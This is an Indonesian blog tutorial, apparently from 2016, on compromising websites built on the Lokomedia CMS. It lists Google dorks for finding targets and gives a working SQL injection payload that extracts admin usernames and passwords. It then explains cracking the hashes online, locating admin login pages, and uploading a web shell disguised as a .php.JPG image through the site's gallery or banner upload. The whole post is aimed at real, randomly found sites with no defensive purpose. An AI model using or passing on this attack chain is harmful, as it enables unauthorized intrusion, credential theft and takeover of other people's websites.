Agustus 02, 2016
Oke, Kali ini saya akan men-share tutorial SQL Lokomedia,
Tutorial ini sangan mudah di gunakan pada pemula :D
Oke langsung aja :D
Dork : - Inurl:kategori-23-hiburan.html
- Inurl:hal-tentang-kami.html
- Inurl:statis-1-pengantar.html
- Inurl:statis-3-visidanmisi.html
- Inurl:statis-19-beasiswa.html
- Inurl:statis-22-kerjasama.html
Selebihnya kembangin Sendiri Oke :*
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
=================== CARA NYA ========================
1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
kategori-23-hiburan.html lalu search di GOOGLE , nanti akan banyak
SITE nya .
2. Buka Website tersebut , Contoh http://site.com/statis-1-pengantar.html
lalu masukan Exploit nya di http://site.com/statis--1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-pengantar.html
Jangan sampai ada spasi , atau exploitnya ketinggalan :v dan tambahkan ( - )
sebelum angka di URL site nya
3. Nanti akan keluar username + password nya di Title web , atau di bagian page sitenya
4. Jika Password nya menggunakan HASH , Decrypt Password tersebut di
hashkiller atau di md5hashing
5. jika password tersebut di temukan carilah admin login nya biasanya ada di
- http://site.com/admin
- http://site.com/adminweb
- http://site.com/administrator
- http://site.com/redaktur ,atau bisa juga di cari menggunakan find admin login
6. Jika berhasil masuk upload shell tersebut di galeri foto , atau banner jika gagal bisa upload
di favico pada web tersebut :D , format shell nya harus berformat contoh.php.JPG
(tambah format .jpg) lalu di Tamper Data , bisa download di add ons pada browser yang
anda gunakan.
7. Lalu akses shell dengan meng-klik kanan mouse , lalu copy paste alamat link foto yang error nya yang tadi kamu upload , ke url baru , dan Selesai :D
SIMPLE KAN :D
sumber
